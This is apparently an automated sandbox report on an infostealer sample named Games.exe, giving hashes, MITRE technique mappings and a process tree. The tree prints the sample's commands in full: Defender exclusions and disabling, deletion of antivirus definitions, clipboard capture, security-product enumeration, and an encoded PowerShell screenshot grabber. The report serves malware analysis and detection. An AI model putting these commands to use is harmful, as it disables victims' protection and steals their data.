2324685434befd2a0c236ba3672b7419856712568ef81ec10e371803e39e43f1

Analysis

max time kernel
433s
max time network
466s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
13-01-2025 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Games.exe
Size

7.6MB
MD5

5a63730ddd02e4989b56190e1de85a07
SHA1

089adde2832dc6103c98220eb8b0bdafe8c74d07
SHA256

2324685434befd2a0c236ba3672b7419856712568ef81ec10e371803e39e43f1
SHA512

f2a4bdd256e837608beaf81ce30ddd237761e667bbfa2a664c1687d24e4fae722801f6ed03ba94f90076f9e7d9c69d780afdb1f58dc585ff59d40222a9a647ff
SSDEEP

196608:/nD+kdvwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWT:/5qIHL7HmBYXrYoaUNU

Score

10^/10

collection defense_evasion discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5100	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3140	powershell.exe
3024	powershell.exe
4672	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4848	powershell.exe
1540	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4864	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe
2244	Games.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3104	tasklist.exe
1752	tasklist.exe
1852	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x002800000004619e-21.dat	upx
behavioral2/memory/2244-25-0x00007FF880620000-0x00007FF880C85000-memory.dmp	upx
behavioral2/files/0x0028000000046191-27.dat	upx
behavioral2/files/0x002800000004619c-31.dat	upx
behavioral2/memory/2244-32-0x00007FF896E30000-0x00007FF896E3F000-memory.dmp	upx
behavioral2/files/0x0028000000046198-48.dat	upx
behavioral2/files/0x0028000000046197-47.dat	upx
behavioral2/files/0x0028000000046196-46.dat	upx
behavioral2/files/0x0028000000046195-45.dat	upx
behavioral2/files/0x0028000000046194-44.dat	upx
behavioral2/files/0x0028000000046193-43.dat	upx
behavioral2/files/0x0028000000046192-42.dat	upx
behavioral2/files/0x0029000000046190-41.dat	upx
behavioral2/files/0x00280000000461a3-40.dat	upx
behavioral2/files/0x00280000000461a2-39.dat	upx
behavioral2/files/0x00280000000461a1-38.dat	upx
behavioral2/files/0x002800000004619d-35.dat	upx
behavioral2/files/0x002800000004619b-34.dat	upx
behavioral2/memory/2244-29-0x00007FF899070000-0x00007FF899097000-memory.dmp	upx
behavioral2/memory/2244-56-0x00007FF896C30000-0x00007FF896C49000-memory.dmp	upx
behavioral2/memory/2244-54-0x00007FF893C10000-0x00007FF893C3B000-memory.dmp	upx
behavioral2/memory/2244-60-0x00007FF8804A0000-0x00007FF88061F000-memory.dmp	upx
behavioral2/memory/2244-58-0x00007FF893BE0000-0x00007FF893C05000-memory.dmp	upx
behavioral2/memory/2244-62-0x00007FF893D00000-0x00007FF893D19000-memory.dmp	upx
behavioral2/memory/2244-66-0x00007FF893240000-0x00007FF893273000-memory.dmp	upx
behavioral2/memory/2244-71-0x00007FF887940000-0x00007FF887A0E000-memory.dmp	upx
behavioral2/memory/2244-74-0x00007FF899070000-0x00007FF899097000-memory.dmp	upx
behavioral2/memory/2244-73-0x00007FF87FF60000-0x00007FF880493000-memory.dmp	upx
behavioral2/memory/2244-70-0x00007FF880620000-0x00007FF880C85000-memory.dmp	upx
behavioral2/memory/2244-76-0x00007FF893840000-0x00007FF893854000-memory.dmp	upx
behavioral2/memory/2244-64-0x00007FF896E20000-0x00007FF896E2D000-memory.dmp	upx
behavioral2/memory/2244-82-0x00007FF87FEA0000-0x00007FF87FF53000-memory.dmp	upx
behavioral2/memory/2244-81-0x00007FF896C30000-0x00007FF896C49000-memory.dmp	upx
behavioral2/memory/2244-79-0x00007FF893830000-0x00007FF89383D000-memory.dmp	upx
behavioral2/memory/2244-78-0x00007FF893C10000-0x00007FF893C3B000-memory.dmp	upx
behavioral2/memory/2244-102-0x00007FF893BE0000-0x00007FF893C05000-memory.dmp	upx
behavioral2/memory/2244-169-0x00007FF8804A0000-0x00007FF88061F000-memory.dmp	upx
behavioral2/memory/2244-188-0x00007FF893D00000-0x00007FF893D19000-memory.dmp	upx
behavioral2/memory/2244-205-0x00007FF893240000-0x00007FF893273000-memory.dmp	upx
behavioral2/memory/2244-227-0x00007FF887940000-0x00007FF887A0E000-memory.dmp	upx
behavioral2/memory/2244-230-0x00007FF87FF60000-0x00007FF880493000-memory.dmp	upx
behavioral2/memory/2244-231-0x00007FF880620000-0x00007FF880C85000-memory.dmp	upx
behavioral2/memory/2244-237-0x00007FF8804A0000-0x00007FF88061F000-memory.dmp	upx
behavioral2/memory/2244-245-0x00007FF87FEA0000-0x00007FF87FF53000-memory.dmp	upx
behavioral2/memory/2244-246-0x00007FF880620000-0x00007FF880C85000-memory.dmp	upx
behavioral2/memory/2244-261-0x00007FF880620000-0x00007FF880C85000-memory.dmp	upx
behavioral2/memory/2244-276-0x00007FF87FF60000-0x00007FF880493000-memory.dmp	upx
behavioral2/memory/2244-289-0x00007FF87FEA0000-0x00007FF87FF53000-memory.dmp	upx
behavioral2/memory/2244-288-0x00007FF893830000-0x00007FF89383D000-memory.dmp	upx
behavioral2/memory/2244-287-0x00007FF893840000-0x00007FF893854000-memory.dmp	upx
behavioral2/memory/2244-286-0x00007FF887940000-0x00007FF887A0E000-memory.dmp	upx
behavioral2/memory/2244-285-0x00007FF893240000-0x00007FF893273000-memory.dmp	upx
behavioral2/memory/2244-284-0x00007FF896E20000-0x00007FF896E2D000-memory.dmp	upx
behavioral2/memory/2244-283-0x00007FF893D00000-0x00007FF893D19000-memory.dmp	upx
behavioral2/memory/2244-282-0x00007FF8804A0000-0x00007FF88061F000-memory.dmp	upx
behavioral2/memory/2244-281-0x00007FF893BE0000-0x00007FF893C05000-memory.dmp	upx
behavioral2/memory/2244-280-0x00007FF896C30000-0x00007FF896C49000-memory.dmp	upx
behavioral2/memory/2244-279-0x00007FF893C10000-0x00007FF893C3B000-memory.dmp	upx
behavioral2/memory/2244-278-0x00007FF896E30000-0x00007FF896E3F000-memory.dmp	upx
behavioral2/memory/2244-277-0x00007FF899070000-0x00007FF899097000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3880	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2540	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
4672	powershell.exe
3140	powershell.exe
4672	powershell.exe
3140	powershell.exe
1044	WMIC.exe
1044	WMIC.exe
1044	WMIC.exe
1044	WMIC.exe
2232	powershell.exe
2232	powershell.exe
4848	powershell.exe
4848	powershell.exe
2232	powershell.exe
4848	powershell.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
1520	WMIC.exe
4832	WMIC.exe
4832	WMIC.exe
4832	WMIC.exe
4832	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
4764	WMIC.exe
3024	powershell.exe
3024	powershell.exe
3880	WMIC.exe
3880	WMIC.exe
3880	WMIC.exe
3880	WMIC.exe
3760	powershell.exe
3760	powershell.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeIncreaseQuotaPrivilege	4672	powershell.exe
Token: SeSecurityPrivilege	4672	powershell.exe
Token: SeTakeOwnershipPrivilege	4672	powershell.exe
Token: SeLoadDriverPrivilege	4672	powershell.exe
Token: SeSystemProfilePrivilege	4672	powershell.exe
Token: SeSystemtimePrivilege	4672	powershell.exe
Token: SeProfSingleProcessPrivilege	4672	powershell.exe
Token: SeIncBasePriorityPrivilege	4672	powershell.exe
Token: SeCreatePagefilePrivilege	4672	powershell.exe
Token: SeBackupPrivilege	4672	powershell.exe
Token: SeRestorePrivilege	4672	powershell.exe
Token: SeShutdownPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeSystemEnvironmentPrivilege	4672	powershell.exe
Token: SeRemoteShutdownPrivilege	4672	powershell.exe
Token: SeUndockPrivilege	4672	powershell.exe
Token: SeManageVolumePrivilege	4672	powershell.exe
Token: 33	4672	powershell.exe
Token: 34	4672	powershell.exe
Token: 35	4672	powershell.exe
Token: 36	4672	powershell.exe
Token: SeIncreaseQuotaPrivilege	3140	powershell.exe
Token: SeSecurityPrivilege	3140	powershell.exe
Token: SeTakeOwnershipPrivilege	3140	powershell.exe
Token: SeLoadDriverPrivilege	3140	powershell.exe
Token: SeSystemProfilePrivilege	3140	powershell.exe
Token: SeSystemtimePrivilege	3140	powershell.exe
Token: SeProfSingleProcessPrivilege	3140	powershell.exe
Token: SeIncBasePriorityPrivilege	3140	powershell.exe
Token: SeCreatePagefilePrivilege	3140	powershell.exe
Token: SeBackupPrivilege	3140	powershell.exe
Token: SeRestorePrivilege	3140	powershell.exe
Token: SeShutdownPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeSystemEnvironmentPrivilege	3140	powershell.exe
Token: SeRemoteShutdownPrivilege	3140	powershell.exe
Token: SeUndockPrivilege	3140	powershell.exe
Token: SeManageVolumePrivilege	3140	powershell.exe
Token: 33	3140	powershell.exe
Token: 34	3140	powershell.exe
Token: 35	3140	powershell.exe
Token: 36	3140	powershell.exe
Token: SeDebugPrivilege	3104	tasklist.exe
Token: SeDebugPrivilege	1852	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1044	WMIC.exe
Token: SeSecurityPrivilege	1044	WMIC.exe
Token: SeTakeOwnershipPrivilege	1044	WMIC.exe
Token: SeLoadDriverPrivilege	1044	WMIC.exe
Token: SeSystemProfilePrivilege	1044	WMIC.exe
Token: SeSystemtimePrivilege	1044	WMIC.exe
Token: SeProfSingleProcessPrivilege	1044	WMIC.exe
Token: SeIncBasePriorityPrivilege	1044	WMIC.exe
Token: SeCreatePagefilePrivilege	1044	WMIC.exe
Token: SeBackupPrivilege	1044	WMIC.exe
Token: SeRestorePrivilege	1044	WMIC.exe
Token: SeShutdownPrivilege	1044	WMIC.exe
Token: SeDebugPrivilege	1044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1044	WMIC.exe
Token: SeRemoteShutdownPrivilege	1044	WMIC.exe
Token: SeUndockPrivilege	1044	WMIC.exe
Token: SeManageVolumePrivilege	1044	WMIC.exe
Token: 33	1044	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2528	AcroRd32.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2528	AcroRd32.exe
2528	AcroRd32.exe
4692	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe
2528	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 2244	3904	Games.exe	79
PID 3904 wrote to memory of 2244	3904	Games.exe	79
PID 2244 wrote to memory of 2328	2244	Games.exe	81
PID 2244 wrote to memory of 2328	2244	Games.exe	81
PID 2244 wrote to memory of 2564	2244	Games.exe	82
PID 2244 wrote to memory of 2564	2244	Games.exe	82
PID 2328 wrote to memory of 4672	2328	cmd.exe	85
PID 2328 wrote to memory of 4672	2328	cmd.exe	85
PID 2564 wrote to memory of 3140	2564	cmd.exe	86
PID 2564 wrote to memory of 3140	2564	cmd.exe	86
PID 2244 wrote to memory of 4752	2244	Games.exe	87
PID 2244 wrote to memory of 4752	2244	Games.exe	87
PID 2244 wrote to memory of 2308	2244	Games.exe	88
PID 2244 wrote to memory of 2308	2244	Games.exe	88
PID 2308 wrote to memory of 3104	2308	cmd.exe	91
PID 2308 wrote to memory of 3104	2308	cmd.exe	91
PID 2244 wrote to memory of 2748	2244	Games.exe	92
PID 2244 wrote to memory of 2748	2244	Games.exe	92
PID 4752 wrote to memory of 1852	4752	cmd.exe	94
PID 4752 wrote to memory of 1852	4752	cmd.exe	94
PID 2244 wrote to memory of 1540	2244	Games.exe	95
PID 2244 wrote to memory of 1540	2244	Games.exe	95
PID 2244 wrote to memory of 3524	2244	Games.exe	96
PID 2244 wrote to memory of 3524	2244	Games.exe	96
PID 2244 wrote to memory of 2696	2244	Games.exe	98
PID 2244 wrote to memory of 2696	2244	Games.exe	98
PID 2244 wrote to memory of 5016	2244	Games.exe	101
PID 2244 wrote to memory of 5016	2244	Games.exe	101
PID 2244 wrote to memory of 4500	2244	Games.exe	103
PID 2244 wrote to memory of 4500	2244	Games.exe	103
PID 2748 wrote to memory of 1044	2748	cmd.exe	133
PID 2748 wrote to memory of 1044	2748	cmd.exe	133
PID 3524 wrote to memory of 1752	3524	cmd.exe	107
PID 3524 wrote to memory of 1752	3524	cmd.exe	107
PID 5016 wrote to memory of 2540	5016	cmd.exe	108
PID 5016 wrote to memory of 2540	5016	cmd.exe	108
PID 2696 wrote to memory of 472	2696	cmd.exe	109
PID 2696 wrote to memory of 472	2696	cmd.exe	109
PID 1540 wrote to memory of 4848	1540	cmd.exe	141
PID 1540 wrote to memory of 4848	1540	cmd.exe	141
PID 4500 wrote to memory of 2232	4500	cmd.exe	111
PID 4500 wrote to memory of 2232	4500	cmd.exe	111
PID 2244 wrote to memory of 2168	2244	Games.exe	113
PID 2244 wrote to memory of 2168	2244	Games.exe	113
PID 2168 wrote to memory of 2972	2168	cmd.exe	115
PID 2168 wrote to memory of 2972	2168	cmd.exe	115
PID 2244 wrote to memory of 2896	2244	Games.exe	137
PID 2244 wrote to memory of 2896	2244	Games.exe	137
PID 2232 wrote to memory of 652	2232	powershell.exe	118
PID 2232 wrote to memory of 652	2232	powershell.exe	118
PID 2896 wrote to memory of 3160	2896	cmd.exe	119
PID 2896 wrote to memory of 3160	2896	cmd.exe	119
PID 2244 wrote to memory of 320	2244	Games.exe	120
PID 2244 wrote to memory of 320	2244	Games.exe	120
PID 320 wrote to memory of 2268	320	cmd.exe	122
PID 320 wrote to memory of 2268	320	cmd.exe	122
PID 2244 wrote to memory of 2084	2244	Games.exe	123
PID 2244 wrote to memory of 2084	2244	Games.exe	123
PID 652 wrote to memory of 1316	652	csc.exe	125
PID 652 wrote to memory of 1316	652	csc.exe	125
PID 2084 wrote to memory of 3044	2084	cmd.exe	126
PID 2084 wrote to memory of 3044	2084	cmd.exe	126
PID 2244 wrote to memory of 1252	2244	Games.exe	127
PID 2244 wrote to memory of 1252	2244	Games.exe	127

C:\Users\Admin\AppData\Local\Temp\Games.exe
"C:\Users\Admin\AppData\Local\Temp\Games.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Users\Admin\AppData\Local\Temp\Games.exe
  "C:\Users\Admin\AppData\Local\Temp\Games.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Games.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Games.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3140
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3524
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
